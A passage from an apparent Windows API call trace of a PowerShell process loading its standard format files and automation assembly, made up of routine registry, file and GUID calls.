lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.293] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x30c) returned 0x0 [0085.293] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.294] CoTaskMemAlloc (cb=0x5a) returned 0x1c6fb0 [0085.294] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1c6fb0, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.294] CoTaskMemFree (pv=0x1c6fb0) [0085.294] RegCloseKey (hKey=0x30c) returned 0x0 [0085.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.297] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xf529f707, Data2=0xcf05, Data3=0x44d8, Data4=([0]=0x9b, [1]=0x68, [2]=0xa4, [3]=0xa0, [4]=0xab, [5]=0xff, [6]=0xd9, [7]=0xe4))) returned 0x0 [0085.298] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x8b2b0269, Data2=0x2ec8, Data3=0x424f, Data4=([0]=0x8e, [1]=0xd9, [2]=0xf3, [3]=0x36, [4]=0xad, [5]=0x78, [6]=0x7e, [7]=0xec))) returned 0x0 [0085.299] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x99373953, Data2=0xf1bd, Data3=0x4462, Data4=([0]=0x9f, [1]=0x9c, [2]=0xf6, [3]=0xbe, [4]=0xa3, [5]=0xc5, [6]=0x37, [7]=0xc7))) returned 0x0 [0085.299] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd8639747, Data2=0x382a, Data3=0x4540, Data4=([0]=0x98, [1]=0x7b, [2]=0x99, [3]=0x20, [4]=0xcf, [5]=0xdb, [6]=0x2e, [7]=0x4b))) returned 0x0 [0085.300] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x8e777338, Data2=0x4a1, Data3=0x45d8, Data4=([0]=0x85, [1]=0xd2, [2]=0xa6, [3]=0x8e, [4]=0x3, [5]=0xd, [6]=0xbb, [7]=0xaa))) returned 0x0 [0085.300] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x8ca31550, Data2=0x6874, Data3=0x4393, Data4=([0]=0x98, [1]=0xf0, [2]=0x4d, [3]=0xc6, [4]=0x83, [5]=0xed, [6]=0xbb, [7]=0x10))) returned 0x0 [0085.301] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.302] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x76ae6f57, Data2=0x1fda, Data3=0x4c89, Data4=([0]=0x96, [1]=0xd3, [2]=0x4d, [3]=0x2c, [4]=0xcd, [5]=0xcb, [6]=0x8f, [7]=0x53))) returned 0x0 [0085.302] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.303] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.305] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xfc8bd0e4, Data2=0xabb3, Data3=0x4a5d, Data4=([0]=0xad, [1]=0x8, [2]=0x23, [3]=0xa5, [4]=0xbf, [5]=0xe5, [6]=0xf8, [7]=0x36))) returned 0x0 [0085.305] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x597a1f2, Data2=0xc56d, Data3=0x4567, Data4=([0]=0xb9, [1]=0xf2, [2]=0x91, [3]=0xf2, [4]=0x35, [5]=0xce, [6]=0x65, [7]=0xbc))) returned 0x0 [0085.305] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xf6c29f55, Data2=0xd7ed, Data3=0x4f3a, Data4=([0]=0x85, [1]=0x11, [2]=0xa, [3]=0x7c, [4]=0xe5, [5]=0x1, [6]=0xae, [7]=0xe7))) returned 0x0 [0085.306] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x4bf22712, Data2=0x2ee6, Data3=0x42f0, Data4=([0]=0x9a, [1]=0x68, [2]=0x4b, [3]=0xe6, [4]=0x1a, [5]=0x19, [6]=0x2a, [7]=0x6d))) returned 0x0 [0085.306] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.306] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xddbe5544, Data2=0xac63, Data3=0x4614, Data4=([0]=0x92, [1]=0x5, [2]=0x2b, [3]=0xab, [4]=0xad, [5]=0xe8, [6]=0xd, [7]=0xb9))) returned 0x0 [0085.306] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.307] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.307] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.308] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.308] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.309] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x9adae345, Data2=0xa36e, Data3=0x4997, Data4=([0]=0xa1, [1]=0x7a, [2]=0x72, [3]=0xd3, [4]=0xcb, [5]=0x45, [6]=0x7, [7]=0x5c))) returned 0x0 [0085.310] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x9edf6036, Data2=0x117e, Data3=0x4825, Data4=([0]=0x89, [1]=0xa6, [2]=0xef, [3]=0x14, [4]=0x83, [5]=0xba, [6]=0x91, [7]=0x87))) returned 0x0 [0085.310] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x22af3290, Data2=0x2ca5, Data3=0x4453, Data4=([0]=0x8e, [1]=0xb6, [2]=0xac, [3]=0x16, [4]=0xaa, [5]=0xf2, [6]=0xf5, [7]=0xc))) returned 0x0 [0085.310] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1997ab59, Data2=0x697d, Data3=0x4c20, Data4=([0]=0x83, [1]=0x3c, [2]=0x37, [3]=0x25, [4]=0x98, [5]=0xd6, [6]=0xf0, [7]=0xc4))) returned 0x0 [0085.311] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd685fc06, Data2=0x76dd, Data3=0x4ee9, Data4=([0]=0xa1, [1]=0x15, [2]=0x6, [3]=0x53, [4]=0x35, [5]=0x3e, [6]=0xdd, [7]=0x59))) returned 0x0 [0085.311] VirtualQuery (in: lpAddress=0xebfa0, lpBuffer=0xece60, dwLength=0x30 | out: lpBuffer=0xece60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.311] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5e73015c, Data2=0x3278, Data3=0x402f, Data4=([0]=0xbb, [1]=0xf3, [2]=0xbb, [3]=0x19, [4]=0x17, [5]=0x3b, [6]=0x66, [7]=0x6))) returned 0x0 [0085.312] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x903236a1, Data2=0xfb5, Data3=0x488e, Data4=([0]=0xbc, [1]=0x49, [2]=0xb7, [3]=0x9d, [4]=0x85, [5]=0x31, [6]=0x6a, [7]=0xb5))) returned 0x0 [0085.312] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x2fb8e13c, Data2=0x6271, Data3=0x44c5, Data4=([0]=0x9e, [1]=0x1d, [2]=0xf1, [3]=0x46, [4]=0x91, [5]=0x5b, [6]=0x3a, [7]=0xa4))) returned 0x0 [0085.313] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x23fc4e75, Data2=0x2423, Data3=0x432a, Data4=([0]=0x8f, [1]=0xb2, [2]=0x93, [3]=0x1, [4]=0x44, [5]=0x90, [6]=0xab, [7]=0xed))) returned 0x0 [0085.313] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x900cd7d3, Data2=0xc26c, Data3=0x459e, Data4=([0]=0x90, [1]=0xd7, [2]=0x1b, [3]=0xea, [4]=0x51, [5]=0xa3, [6]=0x88, [7]=0x33))) returned 0x0 [0085.313] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x3e782b88, Data2=0x1e31, Data3=0x4b66, Data4=([0]=0x83, [1]=0x33, [2]=0xfb, [3]=0xaa, [4]=0xc5, [5]=0xb0, [6]=0x3b, [7]=0x81))) returned 0x0 [0085.314] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x2e38d01d, Data2=0x20cd, Data3=0x4d1b, Data4=([0]=0xab, [1]=0x15, [2]=0x8b, [3]=0xd3, [4]=0xcd, [5]=0xf6, [6]=0x58, [7]=0x1b))) returned 0x0 [0085.314] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x4f439032, Data2=0x63cd, Data3=0x4cc4, Data4=([0]=0xb3, [1]=0x53, [2]=0xe3, [3]=0xeb, [4]=0xce, [5]=0x46, [6]=0x8a, [7]=0x33))) returned 0x0 [0085.314] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xae48f29e, Data2=0xd590, Data3=0x4832, Data4=([0]=0x94, [1]=0xcd, [2]=0xbe, [3]=0xd4, [4]=0x87, [5]=0xf2, [6]=0x63, [7]=0x91))) returned 0x0 [0085.315] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5776fed9, Data2=0xa0a3, Data3=0x409b, Data4=([0]=0xbc, [1]=0xc, [2]=0xff, [3]=0x1, [4]=0xad, [5]=0xf, [6]=0xbb, [7]=0xc5))) returned 0x0 [0085.315] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x10ed9ba2, Data2=0x7b1c, Data3=0x4108, Data4=([0]=0xac, [1]=0xdd, [2]=0xb2, [3]=0x6b, [4]=0xf0, [5]=0xd7, [6]=0x3c, [7]=0x74))) returned 0x0 [0085.316] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1f1fab82, Data2=0x6e9b, Data3=0x467c, Data4=([0]=0x8b, [1]=0x45, [2]=0x0, [3]=0x62, [4]=0x81, [5]=0x2e, [6]=0x60, [7]=0x61))) returned 0x0 [0085.316] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x9c09fcc, Data2=0x8d24, Data3=0x4b0f, Data4=([0]=0xbe, [1]=0xb4, [2]=0x12, [3]=0x49, [4]=0xa1, [5]=0x0, [6]=0x84, [7]=0x44))) returned 0x0 [0085.316] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1a6d4816, Data2=0xfa78, Data3=0x43bd, Data4=([0]=0xbe, [1]=0x95, [2]=0x17, [3]=0x7e, [4]=0xf8, [5]=0x2d, [6]=0xa1, [7]=0xdd))) returned 0x0 [0085.317] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x87dd8a85, Data2=0xa316, Data3=0x425b, Data4=([0]=0xa1, [1]=0xe9, [2]=0x37, [3]=0xa3, [4]=0xa1, [5]=0x5d, [6]=0xc1, [7]=0x9d))) returned 0x0 [0085.317] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xbd68df51, Data2=0x57a9, Data3=0x4939, Data4=([0]=0x9d, [1]=0x48, [2]=0x2, [3]=0xb4, [4]=0x68, [5]=0xdd, [6]=0x88, [7]=0x88))) returned 0x0 [0085.317] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x2d62129b, Data2=0x3af4, Data3=0x4a75, Data4=([0]=0x88, [1]=0xfb, [2]=0x35, [3]=0xbb, [4]=0x53, [5]=0xf5, [6]=0x9a, [7]=0x71))) returned 0x0 [0085.318] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x69ad7a4c, Data2=0x1a5f, Data3=0x4f39, Data4=([0]=0x80, [1]=0x94, [2]=0x58, [3]=0x4, [4]=0x5e, [5]=0x9, [6]=0x9c, [7]=0x22))) returned 0x0 [0085.318] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xfcbdc194, Data2=0x8c08, Data3=0x4b39, Data4=([0]=0x84, [1]=0x5a, [2]=0x31, [3]=0xf9, [4]=0x59, [5]=0x38, [6]=0x1a, [7]=0x7e))) returned 0x0 [0085.318] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.321] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.323] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.324] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd8cbd56a, Data2=0xcb2b, Data3=0x4a01, Data4=([0]=0x95, [1]=0x5e, [2]=0x64, [3]=0xe3, [4]=0x5a, [5]=0xac, [6]=0xda, [7]=0x93))) returned 0x0 [0085.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0085.325] SetErrorMode (uMode=0x1) returned 0x1 [0085.325] SetErrorMode (uMode=0x1) returned 0x1 [0085.325] GetFileType (hFile=0x30c) returned 0x1 [0085.325] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.327] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.328] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.328] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.329] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.329] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.329] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x119, lpOverlapped=0x0) returned 1 [0085.329] ReadFile (in: hFile=0x30c, lpBuffer=0x33a5738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x33a5738*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.329] CloseHandle (hObject=0x30c) returned 1 [0085.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0085.330] SetErrorMode (uMode=0x1) returned 0x1 [0085.330] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0085.330] SetErrorMode (uMode=0x1) returned 0x1 [0085.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0085.330] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x30c) returned 0x0 [0085.330] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.330] CoTaskMemAlloc (cb=0x5a) returned 0x1c6fb0 [0085.330] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1c6fb0, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.330] CoTaskMemFree (pv=0x1c6fb0) [0085.330] RegCloseKey (hKey=0x30c) returned 0x0 [0085.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0085.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0085.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.332] VirtualQuery (in: lpAddress=0xebba0, lpBuffer=0xeca60, dwLength=0x30 | out: lpBuffer=0xeca60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.333] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xb2d0ab20, Data2=0x5247, Data3=0x43f0, Data4=([0]=0xa7, [1]=0x69, [2]=0xce, [3]=0x36, [4]=0xa5, [5]=0xa6, [6]=0xea, [7]=0x2d))) returned 0x0 [0085.334] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.336] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xd75c399, Data2=0xea1a, Data3=0x4937, Data4=([0]=0x87, [1]=0x5e, [2]=0x24, [3]=0x54, [4]=0x2f, [5]=0xf3, [6]=0x69, [7]=0xfc))) returned 0x0 [0085.337] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xdb24aa39, Data2=0x967c, Data3=0x44fd, Data4=([0]=0xb2, [1]=0xbc, [2]=0x14, [3]=0xea, [4]=0xdb, [5]=0xf2, [6]=0x9, [7]=0x22))) returned 0x0 [0085.338] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x7edf4edd, Data2=0xdca2, Data3=0x42d4, Data4=([0]=0x99, [1]=0x65, [2]=0xcb, [3]=0x40, [4]=0xe7, [5]=0x8a, [6]=0x54, [7]=0x61))) returned 0x0 [0085.338] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.339] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0085.340] SetErrorMode (uMode=0x1) returned 0x1 [0085.340] SetErrorMode (uMode=0x1) returned 0x1 [0085.340] GetFileType (hFile=0x30c) returned 0x1 [0085.340] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.343] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.344] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.344] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.345] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.345] ReadFile (in: hFile=0x30c, lpBuffer=0x34018d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x34018d8*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 